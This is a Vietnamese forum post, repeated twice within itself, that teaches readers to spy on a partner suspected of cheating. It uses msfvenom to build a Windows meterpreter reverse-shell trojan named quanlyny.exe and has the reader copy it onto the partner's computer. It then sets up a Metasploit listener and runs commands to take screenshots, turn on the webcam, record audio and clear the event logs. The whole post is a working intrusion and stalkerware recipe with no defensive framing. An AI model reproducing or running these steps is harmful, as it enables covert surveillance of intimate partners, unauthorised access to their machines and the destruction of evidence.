khanhhoangbkdn
VIP Members
-
07/10/2016
-
34
-
65 bài viết
msfvenom-tao 1 trojan điều khiển máy nạn nhân
Vào 1 đẹp trời bạn nghi ngờ người yêu bạn ngoại tình bạn không biết làm thế nào để xác nhận với có phải hay không ?
Bước đầu tiên bạn hay tải về metasploits nếu bạn không có. và làm theo các bước dưới đây để xem ny làm gì trên máy tính
B1: vào metasploits framework lệnh #msfconsole và tạo 1 trojan với lệnh
#msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 EXITFUNC=thread -b '\x60' -f exe -only -o /root/quanlyny.exe
-trojan này sẽ lưu lại với tên quanlyny.exe bằng cách nào đó copy qua máy victim và khoan hãy chạy lên
B2:sử dụng exploits handler để lắng nghe kết nối của máy victim
#use exploit/multi/handler
#set payload windows/x64/meterpreter/reverse_tcp
#set lhost myip(nếu cùng mạng thì gõ ifconfig để lấy ip của mình ,còn khác mạng thì vào trang https://www.whatismyip .com/ để xem ip public)
#set lport 4444
#exploit (đợi kết nối từ máy victim nếu victim chạy file quanlyny.exe thì sẽ có 1 session được tạo ra )
B3:hiển thị session mới tạo ra #sessions -v
Kết nối tới session với lệnh #sessions -i -1
Bây giờ ta có 1 shell với meterpreter đến đây bạn có thể khai thác trên máy victim với các lệnh
#screenshot //chụp màn hình victim
#run webcam -l //Gọi webcam trên máy nạn nhân ta có
#clearev //Xóa file log trên máy nạn nhân
#run sound_recorder -h //ghi âm máy nạn nhân
Còn nhiều lệnh nữa các bạn tự tìm hiểu
Bước đầu tiên bạn hay tải về metasploits nếu bạn không có. và làm theo các bước dưới đây để xem ny làm gì trên máy tính
B1: vào metasploits framework lệnh #msfconsole và tạo 1 trojan với lệnh
#msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 EXITFUNC=thread -b '\x60' -f exe -only -o /root/quanlyny.exe
-trojan này sẽ lưu lại với tên quanlyny.exe bằng cách nào đó copy qua máy victim và khoan hãy chạy lên
B2:sử dụng exploits handler để lắng nghe kết nối của máy victim
#use exploit/multi/handler
#set payload windows/x64/meterpreter/reverse_tcp
#set lhost myip(nếu cùng mạng thì gõ ifconfig để lấy ip của mình ,còn khác mạng thì vào trang https://www.whatismyip .com/ để xem ip public)
#set lport 4444
#exploit (đợi kết nối từ máy victim nếu victim chạy file quanlyny.exe thì sẽ có 1 session được tạo ra )
B3:hiển thị session mới tạo ra #sessions -v
Kết nối tới session với lệnh #sessions -i -1
Bây giờ ta có 1 shell với meterpreter đến đây bạn có thể khai thác trên máy victim với các lệnh
#screenshot //chụp màn hình victim
#run webcam -l //Gọi webcam trên máy nạn nhân ta có
#clearev //Xóa file log trên máy nạn nhân
#run sound_recorder -h //ghi âm máy nạn nhân
Còn nhiều lệnh nữa các bạn tự tìm hiểu
Chỉnh sửa lần cuối bởi người điều hành:
